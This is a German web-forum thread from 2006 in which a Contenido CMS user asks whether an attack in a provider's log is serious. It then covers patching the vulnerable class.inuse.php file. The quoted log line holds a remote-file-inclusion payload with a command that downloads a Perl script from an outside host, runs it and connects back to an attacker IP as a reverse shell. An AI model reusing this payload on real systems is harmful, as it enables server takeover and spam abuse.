Angriffe

prefix · Beitrag von **prefix** » Do 19. Jan 2006, 07:38

morgen!

gestern erhielt ich ein mail meines (besorgten) providers, in welchem er folgende logfile-einträge aus meiner 4.4er-contenido-version beschrieb:

> hier ein auszug aus dem logfile.
>
> ***-access.log:200.141.102.225 - - [18/Jan/2006:07:57:34
> +0100] "GET
> /contenido/classes/class.inuse.php?cfg[path][contenido]=http:/
/freeweb.dnet.it/vnc/cmd.txt?&cmd=cd%20/tmp;GET%>
20http://www.groupiys.com/xpl/dc.txt%20>%20dc.txt;chmod%20777%
> 20dc.txt;perl%20dc.txt%20200.141.102.225%2030010
> HTTP/1.1" 200 2166 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows
> 98)"

sind das erstzunehmende angriffe bzw. muss ich ein update fahren (was mir weh tun würde, da die 4.4er sehr individuell angepasst ist)?

danke für die hilfe.

prefix · Beitrag von **prefix** » Do 19. Jan 2006, 07:50

weitere info meines providers:

Über dieses Backdoor wurde versucht knapp eine Mio Spams zu versenden, konnte das zum Glück rechtzeitig abfangen - das wären nämlich ca 800GB Daten gewesen

prefix · Beitrag von **prefix** » Do 19. Jan 2006, 08:02

sorry, war ein wenig vorschnell - problem ist bekannt und ich denke auch gelöst.

ist es nur nötig, die eine classe zu ersetzen? siehe http://www.contenido.org/forum/viewtopic.php?t=10737

dann brauch ich ja gar kein update fahren, oder?

stese · Beitrag von **stese** » Do 19. Jan 2006, 08:06

moin jo! grüß dich, melde dich mal via mail.

prefix · Beitrag von **prefix** » Di 31. Jan 2006, 16:22

so, hab meine 4.4 jetzt mit der class.inuse.php upgedatet, folgendes statement von meinem (erfahrenen) provider:

ich hatte vorhin ein backup retour gespielt mit der alten classe -> seite funktioniert.
neue klasse -> seite bleibt weiss.

habe einfach die class.inuse.php von 4.4.6 genommen wie hier beschrieben: http://www.contenido.org/forum/viewtopic.php?t=10737

woran kann das jetzt noch immer liegen?

bitte um dringende hilfe, danke (muss leider bald für ein paar tage weg)

stese · Beitrag von **stese** » Di 31. Jan 2006, 16:27

error log?

prefix · Beitrag von **prefix** » Di 31. Jan 2006, 16:30

haaa, mom - du bist mein glücksbringer. grad hat sich auch mein provider gemeldet; er hat beim einspielen einen kleinen irrtum begangen und nicht 4.4.6, sondern 4.6.6 eingespielt - daher hat es nicht geklappt.

seit jetzt klappt es wieder - juhuu und danke.

ich meld mich übrigens samstag mal bei dir stese, da bin ich von der armee wieder zurück

stese · Beitrag von **stese** » Di 31. Jan 2006, 16:33

harhar jap gut so - viel spass :) ich hoffe du hast nicht so viel minusgrade - bzw deine ausführenden leute :D

bis später dann